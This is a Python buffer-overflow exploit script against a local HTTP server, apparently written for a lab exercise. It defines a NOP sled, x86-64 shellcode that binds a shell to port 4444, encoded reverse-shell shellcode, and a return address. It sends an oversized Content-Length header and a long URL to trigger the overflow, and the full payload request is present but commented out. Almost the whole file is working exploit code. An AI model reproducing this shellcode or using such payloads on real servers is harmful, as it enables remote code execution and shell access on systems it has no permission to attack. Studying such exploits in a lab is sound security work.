import requests
import logging

logging.basicConfig(level=logging.DEBUG)

#NOP sled prefix
prefix = b"\x90" * 500 #1136 total

#bind a shell to port 4444
tcpbind = b"\x31\xc0\x31\xdb\x31\xd2\xb0\x01\x89\xc6\xfe\xc0\x89\xc7\xb2\x06\xb0\x29\x0f\x05\x93\x48\x31\xc0\x50\x68\x02\x01\x11\x5c\x88\x44\x24\x01\x48\x89\xe6\xb2\x10\x89\xdf\xb0\x31\x0f\x05\xb0\x05\x89\xc6\x89\xdf\xb0\x32\x0f\x05\x31\xd2\x31\xf6\x89\xdf\xb0\x2b\x0f\x05\x89\xc7\x48\x31\xc0\x89\xc6\xb0\x21\x0f\x05\xfe\xc0\x89\xc6\xb0\x21\x0f\x05\xfe\xc0\x89\xc6\xb0\x21\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x50\x5f\xb0\x3c\x0f\x05"

#reverse shell nc -vlp 1907
remote = b"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05\xef\xff\xff\xff\x48\xbb\xdf\x4b\x06\xb1\x71\x71\x46\x28\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xb5\x62\x5e\x28\x1b\x73\x19\x42\xde\x15\x09\xb4\x39\xe6\x0e\x91\xdd\x4b\x01\xc2\x0e\x71\x46\x29\x8e\x03\x8f\x57\x1b\x61\x1c\x42\xf5\x13\x09\xb4\x1b\x72\x18\x60\x20\x85\x6c\x90\x29\x7e\x43\x5d\x29\x21\x3d\xe9\xe8\x39\xfd\x07\xbd\x22\x68\x9e\x02\x19\x46\x7b\x97\xc2\xe1\xe3\x26\x39\xcf\xce\xd0\x4e\x06\xb1\x71\x71\x46\x28"

postlen = 1136 - len(prefix) - len(remote)
print(len(tcpbind))

#NOP sled postfix
postfix = b"\x90" * (postlen - 8) #497

#address pointing (theoretically) in the NOP sled prefix
addr = b"\x4c\xfa\x5a\xf7\xff\x7f" #may need re-computation

#test if we found the correct length
testaddr = "A"*8

try:
    #POST request with crafted Content-Length field
    #response = requests.post('http://localhost:8080/', headers={'Content-Length' : prefix+remote+postfix+addr}, timeout=5)
    response = requests.post('http://localhost:8080/', headers={'Content-Length' : 'A'*1024}, timeout=5)
    #GET request with crafted URL
    #response = requests.get('http://localhost:8080/{}'.format('A'*1500), timeout=5)   
    logging.debug(response.text)
except Exception as e:
    logging.debug(e)